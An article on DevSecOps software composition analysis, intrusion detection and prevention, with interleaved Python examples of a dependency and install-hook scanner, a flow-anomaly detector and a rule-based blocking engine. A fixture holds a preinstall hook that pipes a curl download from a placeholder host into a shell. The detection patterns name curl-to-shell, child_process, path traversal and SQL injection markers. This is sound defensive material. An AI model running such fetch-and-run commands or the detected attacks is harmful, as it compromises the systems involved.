[Part 3] DevSecOps SCA/IDS/IPS

Alexander Lahutsin
6 min read · Oct 30, 2023

Welcome to the third DevSecOps article. Previous articles:
  • Part 0: https://medium.com/@lahutsin/part-0-devsecops-introduction-412e3aa019a6
  • Part 1: https://medium.com/@lahutsin/part-1-devsecops-analytics-41c560004da3
  • Part 2: https://medium.com/@lahutsin/part-2-devsecops-nast-96f7c9e25645
(spoiler: Parts 0–7)

Today we will talk about analyzing and detecting intrusions and countering them. As a rule, any application consists of public components that need to be controlled. I hope you will be satisfied with the knowledge you gain in this specialization and continue to develop this area in the future. This series of articles assumes a basic understanding and knowledge of DevOps. As an author, I do not claim to have a final or conclusive expert opinion in this area.

SCA

Software Composition Analysis (SCA) is the process of analyzing and assessing the security of third-party components that are used in your software.

SCA is used as part of DevSecOps practices to ensure the security of applications and reduce the risks associated with using open-source third-party components.

It involves analyzing all dependencies and third-party libraries that are used in your application and determining whether those components have been associated with any security vulnerabilities or known exploits.

SCA allows developers to quickly and effectively identify and remediate vulnerabilities in third-party components, which improves the security of applications and reduces the likelihood of critical errors occurring during development.

[Figure: SCA]

As we know, every build toolchain has a built-in package auditing mechanism, which is definitely a good thing. However, there are some nuances. As a rule, this audit is rarely acted upon, because it is informational in nature. Our task is to make this check strictly mandatory, including the case where a particular package or component contains malicious code that the community has not yet discovered.

As was clear from previous articles, there are paid and free solutions, and the choice depends on how much you want to invest in implementing this toolkit. This analysis is usually performed at the artifact assembly stage, which means that if a potentially dangerous third-party component is found, the artifact simply does not pass further down the pipeline. Therefore, a more detailed pipeline scheme looks as follows.

What is the point of doing this at all? Standard auditing tools search for vulnerabilities that have already been found in a specific version of a package and suggest updating to a more recent version. Third-party SCA utilities, on the other hand, can also find malware or embedded malicious code in the dependency tree based on certain indicators.
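To make that contrast concrete, here is an added example (not the article's code and not any of the SCA tools listed below) of a minimal pipeline gate in Python. It does both things the paragraph describes: it checks pinned dependencies against a constructed advisory list and fails the build at or above a chosen severity, and it flags install-time hooks in a package.json whose commands match constructed indicators. The advisory ids, package names, versions, hook patterns and the URL are all made up for the example.

```python
"""Minimal SCA gate (added example, not from the article or any listed tool).

Two checks the article contrasts:
  1. known-vulnerability lookup of pinned dependencies against an advisory list
  2. indicator-based flagging of install-time hooks that can run arbitrary code

All inputs below are constructed sample data, not real advisories or packages.
"""
import json
import re

# Constructed advisory feed: package -> list of (min_affected, max_affected_exclusive, severity, id).
# The ids are placeholders, not real CVE/GHSA identifiers.
ADVISORIES = {
    "left-padder": [("1.0.0", "1.3.2", "high", "ADV-EXAMPLE-0001")],
    "yaml-loader": [("0.0.0", "2.0.0", "critical", "ADV-EXAMPLE-0002")],
    "colorize":    [("4.0.0", "4.1.0", "moderate", "ADV-EXAMPLE-0003")],
}

SEVERITY_RANK = {"low": 1, "moderate": 2, "high": 3, "critical": 4}

# Constructed lockfile excerpt in "name==version" form (pip-style pins).
SAMPLE_LOCK = """\
left-padder==1.2.0
yaml-loader==2.1.0
colorize==4.0.5
requests-clone==3.0.0
"""

# Constructed package.json with an install hook; the hook is an *indicator*, not proof of malware.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "demo-app",
    "scripts": {
        "preinstall": "node -e \"require('child_process').exec('curl http://example.invalid/x | sh')\"",
        "test": "jest",
    },
})


def parse_version(v):
    """'1.2.3' -> (1, 2, 3); non-numeric parts are dropped so comparison stays numeric."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def parse_lock(text):
    """Return {name: version} from 'name==version' lines, ignoring blanks and comments."""
    deps = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _, version = line.partition("==")
        deps[name.strip()] = version.strip()
    return deps


def find_known_vulnerabilities(deps):
    """Check 1: list (name, version, severity, advisory_id) for pins inside an affected range."""
    findings = []
    for name, version in deps.items():
        for lo, hi, severity, adv_id in ADVISORIES.get(name, []):
            if parse_version(lo) <= parse_version(version) < parse_version(hi):
                findings.append((name, version, severity, adv_id))
    return findings


# Constructed indicator patterns for lifecycle hooks: remote fetch piped to a shell, child_process, eval.
HOOK_NAMES = ("preinstall", "install", "postinstall", "prepare")
SUSPICIOUS_PATTERNS = [
    re.compile(r"curl[^|]*\|\s*(sh|bash)"),
    re.compile(r"wget[^|]*\|\s*(sh|bash)"),
    re.compile(r"child_process"),
    re.compile(r"\beval\s*\("),
]


def find_install_hook_indicators(package_json_text):
    """Check 2: return (hook_name, matched_pattern) for scripts that run at install time."""
    scripts = json.loads(package_json_text).get("scripts", {})
    hits = []
    for hook in HOOK_NAMES:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        for pattern in SUSPICIOUS_PATTERNS:
            if pattern.search(cmd):
                hits.append((hook, pattern.pattern))
    return hits


def sca_gate(lock_text, package_json_text, fail_at="high"):
    """Pipeline decision: (True, vulns, hooks) = artifact may proceed; False = stop the build.

    Known vulnerabilities at or above `fail_at` block the build. Any install-hook indicator
    blocks as well, because code the community has not yet flagged must still not pass.
    """
    vulns = find_known_vulnerabilities(parse_lock(lock_text))
    hooks = find_install_hook_indicators(package_json_text)
    blocking = [v for v in vulns if SEVERITY_RANK[v[2]] >= SEVERITY_RANK[fail_at]]
    return (not blocking and not hooks), vulns, hooks


if __name__ == "__main__":
    ok, vulns, hooks = sca_gate(SAMPLE_LOCK, SAMPLE_PACKAGE_JSON)
    for v in vulns:
        print("known vulnerability:", v)
    for h in hooks:
        print("install-hook indicator:", h)
    print("build may proceed:", ok)
```

Run it as a CI step before the artifact is published; a `False` first return value is the signal to stop the build. The severity floor is the tuning knob: moderate findings are reported but do not block by default, while install-hook indicators always block because they are exactly the case the audit alone would miss.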

IDS

IDS (Intrusion Detection System) is a system that is used to monitor network activity and detect possible attacks on computer systems and applications.

IDS is part of the DevSecOps approach to security, which involves embedding security throughout the development process, not just in the final product. IDS is used to detect malicious activity and other types of attacks that could threaten the security of the system.

IDS works by monitoring network traffic and analyzing it for anomalies that could indicate an attack or other unwanted activity. When the system detects an anomaly, it sends an alert or signal for further analysis and response.

IDS can be implemented using both hardware and software. It can operate independently or as part of a comprehensive security system. IDS helps to prevent attacks and improve the overall security of the system.
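As an added example (not from the article and not from any of the IDS tools listed below), the following Python sketch applies two such checks to a constructed set of flow records: a behavioural rule that flags one source touching many distinct ports on one host inside a short window, and a baseline rule that flags a flow whose byte count is far above that source's running mean. It only returns alerts for analysis, which is the IDS part of the job; blocking belongs to the IPS. Thresholds, addresses and flows are all constructed.

```python
"""Network-IDS style anomaly detection over flow records (added example; not the article's
code and not any listed tool). Flow records are constructed sample data.
"""
from collections import defaultdict

# Constructed flow log: (timestamp_s, src_ip, dst_ip, dst_port, bytes)
SAMPLE_FLOWS = [
    (100, "10.0.1.5", "10.0.2.10", 443, 5200),
    (101, "10.0.1.5", "10.0.2.10", 443, 4900),
    (102, "10.0.1.9", "10.0.2.10", 22, 900),
    (103, "10.0.1.9", "10.0.2.10", 23, 60),
    (103, "10.0.1.9", "10.0.2.10", 25, 60),
    (104, "10.0.1.9", "10.0.2.10", 80, 60),
    (104, "10.0.1.9", "10.0.2.10", 110, 60),
    (105, "10.0.1.9", "10.0.2.10", 143, 60),
    (106, "10.0.1.5", "10.0.2.10", 443, 5100),
    (170, "10.0.1.5", "10.0.2.11", 443, 900000),
]

PORT_SWEEP_THRESHOLD = 5   # distinct destination ports from one source to one host ...
WINDOW_S = 10              # ... within this many seconds
VOLUME_FACTOR = 20         # a flow larger than factor * the source's running mean is anomalous


def detect_port_sweeps(flows, threshold=PORT_SWEEP_THRESHOLD, window=WINDOW_S):
    """Alert once per (src, dst) pair when the distinct ports seen inside the window reach threshold."""
    seen = defaultdict(list)   # (src, dst) -> [(ts, port), ...]
    alerted = set()
    alerts = []
    for ts, src, dst, port, _ in sorted(flows):
        key = (src, dst)
        seen[key].append((ts, port))
        recent = {p for t, p in seen[key] if ts - t <= window}
        if len(recent) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"type": "port_sweep", "ts": ts, "src": src, "dst": dst,
                           "ports": sorted(recent)})
    return alerts


def detect_volume_anomalies(flows, factor=VOLUME_FACTOR, min_history=2):
    """Alert when a flow's byte count far exceeds the mean of that source's previous flows.

    The baseline is learned on the fly from the source's own history, so the first
    `min_history` flows of a new source are never judged (no baseline yet).
    """
    history = defaultdict(list)   # src -> [bytes, ...]
    alerts = []
    for ts, src, dst, port, nbytes in sorted(flows):
        past = history[src]
        if len(past) >= min_history:
            mean = sum(past) / len(past)
            if nbytes > factor * mean:
                alerts.append({"type": "volume_anomaly", "ts": ts, "src": src, "dst": dst,
                               "port": port, "bytes": nbytes, "baseline": round(mean, 1)})
        past.append(nbytes)
    return alerts


def run_ids(flows):
    """Return every alert from both detectors; an IDS hands these on for analysis, it does not block."""
    return detect_port_sweeps(flows) + detect_volume_anomalies(flows)


if __name__ == "__main__":
    for alert in run_ids(SAMPLE_FLOWS):
        print(alert)
```

On the sample data the port rule fires once for 10.0.1.9 (five ports in three seconds) and the volume rule fires once for the 900 kB flow from 10.0.1.5, whose earlier flows were all around 5 kB. Both thresholds are deliberately parameters: tuning them against the real traffic of the internal and nested networks is what keeps the alert volume useful.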

It is worth noting that the IDS tools listed below (see Extra) are mainly used in traditional networks, but in theory they can also work in microservices.

Given the above, it becomes clear that the cluster approach is now more popular, so the detection system should monitor the cluster's internal network and any other nested network, not least because the cloud provider usually does not give you extensive control over its own networks, for reasons of its own security.

IPS

In the context of DevSecOps, IPS (Intrusion Prevention System) refers to a security mechanism or tool that is integrated into development and operations processes to detect and prevent intrusions or attacks on a system or application under development or deployment. IPS plays an important role in ensuring the security and integrity of software throughout its lifecycle.

In DevSecOps, IPS is typically used to provide preventive security measures in the continuous integration, continuous delivery, and continuous deployment (CI/CD) process. It helps to identify and block potential security vulnerabilities or malicious activity in real-time, ensuring that only safe and secure code is deployed to production environments.

Here are some key aspects of IPS in the context of DevSecOps:

  • Real-time preventive protection: IPS actively monitors network traffic, system logs, or application activity to detect suspicious or malicious behavior. It uses a variety of techniques, such as signature-based detection, behavioral analysis, anomaly detection, and heuristics to identify potential threats.
  • Automated response: IPS can automatically respond to detected threats or attacks by taking pre-defined actions, such as blocking certain IP addresses, terminating network connections, or applying access control policies. Automation helps to reduce response time and minimize the impact of security incidents.
  • Integration into CI/CD pipeline: IPS can be seamlessly integrated into the CI/CD pipeline, allowing security checks and protection mechanisms to be applied at different stages of the software development and deployment process. This ensures that security is an integral part of the entire development lifecycle.
  • Rule tuning and optimization: IPS solutions provide flexibility for tuning and optimizing security rules to meet the specific needs of the application or system. This allows organizations to configure IPS to meet their unique security requirements and minimize false positives or misses.
  • Continuous monitoring and feedback loop: IPS continuously monitors the system or application for new threats and provides feedback to developers. This feedback loop promotes continuous improvement of security practices and helps to proactively address vulnerabilities or weaknesses.

Integrating IPS into the DevSecOps workflow allows organizations to improve the security of their applications and systems, reduce the risk of data breaches or cyberattacks, and ensure that security is embedded at all stages of software development and deployment.
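The following is an added example (not the article's code and not any commercial IPS) of the aspects just listed, written in Python over constructed request events: signature rules with a per-rule action, a repetition threshold so that a single failed login does not fire, an allowlist as the tuning knob against false positives, and an automated response that drops a source's traffic for a fixed period. Rule patterns, IP addresses, paths and timings are all constructed.

```python
"""Inline IPS-style engine (added example; not from the article or any listed product).

Each rule has a regex over "request status", an action ("block" or "alert") and an optional
threshold (count, window_s) for rules that should only fire on repetition. Everything below
is constructed sample data.
"""
import re
from collections import defaultdict

RULES = [
    {"id": "R1", "name": "path traversal marker", "pattern": re.compile(r"\.\./"), "action": "block"},
    {"id": "R2", "name": "sql injection marker", "pattern": re.compile(r"(?i)union\s+select"), "action": "block"},
    {"id": "R3", "name": "login failure burst", "pattern": re.compile(r"POST /login 401$"),
     "action": "block", "threshold": (5, 60)},
    {"id": "R4", "name": "repo metadata probe", "pattern": re.compile(r"/\.git/"), "action": "alert"},
]

# Constructed events: (timestamp_s, src_ip, request_line, status)
SAMPLE_EVENTS = [
    (1000, "198.51.100.7", "GET /index.html", 200),
    (1001, "198.51.100.7", "GET /static/../../app.conf", 404),   # R1 -> block source
    (1002, "198.51.100.7", "GET /index.html", 200),               # dropped while blocked
    (1003, "203.0.113.9", "POST /login", 401),                    # R3 count 1 of 5
    (1004, "203.0.113.9", "POST /login", 401),
    (1005, "203.0.113.9", "POST /login", 401),
    (1006, "203.0.113.9", "POST /login", 401),
    (1007, "203.0.113.9", "POST /login", 401),                    # 5th in 60 s -> block
    (1008, "192.0.2.5", "POST /login", 401),                      # allowlisted probe -> pass
    (1009, "192.0.2.44", "GET /.git/config", 404),                # R4 -> alert only
    (1400, "198.51.100.7", "GET /index.html", 200),               # block expired -> pass
]


class Ips:
    def __init__(self, rules, allowlist=(), block_seconds=300):
        self.rules = rules
        self.allowlist = set(allowlist)        # tuning: sources that must never be blocked
        self.block_seconds = block_seconds
        self.blocked_until = {}                # src -> expiry timestamp
        self.hits = defaultdict(list)          # (rule_id, src) -> [ts, ...] inside the window
        self.log = []                          # (ts, src, rule_id, action) for the feedback loop

    def _threshold_reached(self, rule, src, ts):
        count, window = rule.get("threshold", (1, 0))
        bucket = self.hits[(rule["id"], src)]
        bucket.append(ts)
        bucket[:] = [t for t in bucket if ts - t <= window]
        return len(bucket) >= count

    def handle(self, ts, src, request, status):
        """Return 'pass', 'alert', 'block' (new block applied) or 'drop' (existing block)."""
        if src in self.allowlist:
            return "pass"
        if self.blocked_until.get(src, -1) > ts:
            return "drop"
        line = f"{request} {status}"
        decision = "pass"
        for rule in self.rules:
            if not rule["pattern"].search(line):
                continue
            if not self._threshold_reached(rule, src, ts):
                continue
            self.log.append((ts, src, rule["id"], rule["action"]))
            if rule["action"] == "block":
                self.blocked_until[src] = ts + self.block_seconds   # automated response
                return "block"
            decision = "alert"
        return decision


def run_sample():
    """Feed the constructed events through one engine; 192.0.2.5 stands for an allowlisted monitor."""
    ips = Ips(RULES, allowlist=["192.0.2.5"])
    decisions = [ips.handle(*event) for event in SAMPLE_EVENTS]
    return decisions, ips


if __name__ == "__main__":
    decisions, ips = run_sample()
    for event, decision in zip(SAMPLE_EVENTS, decisions):
        print(event[0], event[1], decision)
    print("rule log:", ips.log)
```

The `log` list is the feedback loop from the last bullet: every rule that fired, with its action, goes back to the developers and to whoever tunes the rules. The allowlist and the R3 threshold are the two places where false positives are controlled; without them a synthetic-monitoring probe that deliberately fails logins would be blocked on its first attempt.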

As always, the work of all types of utilities is shown below in a general context (taking into account the previous articles). Pay attention to where each tool is placed; this was done intentionally, although in some cases a stage may be moved.

[Figure: SCA/SAST/OAST/IAST/DAST/IDS/IPS]

Given that we currently live in a world of containers, it becomes clear what significant disadvantages and risks we face if we use services with limited orchestration. It is also important to be able to implement IDS/IPS systems in a cluster, or on classic hand-managed "pet" nodes if you prefer that style.

Extra:

SCA tools:

  • OWASP Dependency-Check
  • WhiteSource Bolt
  • Snyk
  • Sonatype Nexus Lifecycle
  • FOSSA
  • Dependabot
  • GitLab Dependency Scanning
  • Black Duck Hub Detect
  • AuditJS
  • Nexus Firewall
  • and more…

IDS tools:

  • Snort
  • Suricata
  • Bro
  • OSSEC
  • Security Onion
  • Snorby
  • SELKS
  • OpenWIPS-ng
  • Zeek
  • Suricata-update
  • and more…

IDS tools (for Kubernetes):

  • Falco
  • Sysdig Secure
  • Aqua Security
  • Sysdig Falco Operator
  • kube-hunter
  • Ksniff
  • kube-batch
  • kube-psp-advisor
  • KubeArmor
  • and more…

Write your opinions in the comments.
What do you think about this?

Best Regards,
Alex Lahutsin
